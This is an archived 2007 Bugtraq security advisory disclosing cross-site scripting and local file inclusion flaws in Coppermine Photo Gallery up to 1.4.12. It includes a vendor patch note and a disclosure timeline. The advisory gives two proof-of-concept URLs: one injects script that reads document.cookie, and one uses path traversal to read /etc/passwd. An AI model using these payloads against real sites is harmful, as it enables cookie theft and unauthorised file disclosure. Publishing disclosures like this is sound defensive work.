lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 17 Sep 2007 22:31:13 +0200 From: L4teral <l4teral@...il.com> To: bugtraq@...urityfocus.com Subject: Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion ============================================================ Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion ============================================================ Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting/Local File Inclusion Status: patch available ------------------------------ Affected software description: ------------------------------ Application: Coppermine Photo Gallery Version: <= 1.4.12 Vendor: http://coppermine-gallery.net Description: Coppermine is a multi-purpose fully-featured and integrated web picture gallery script written in PHP using GD or ImageMagick as image library with a MySQL backend. ---------------- Vulnerabilities: ---------------- The script mode.php does not properly sanitize the "referer" parameter. The script viewlog.php does not properly sanitize the "log" parameter. ------------ Poc/Exploit: ------------ http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie) http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00 (should need admin privileges) --------- Solution: --------- update to 1.4.13 or above --------- Timeline: --------- 03.09.2007 - vendor informed 14.09.2007 - patch released by vendor 17.09.2007 - public disclosure
Powered by blists - more mailing lists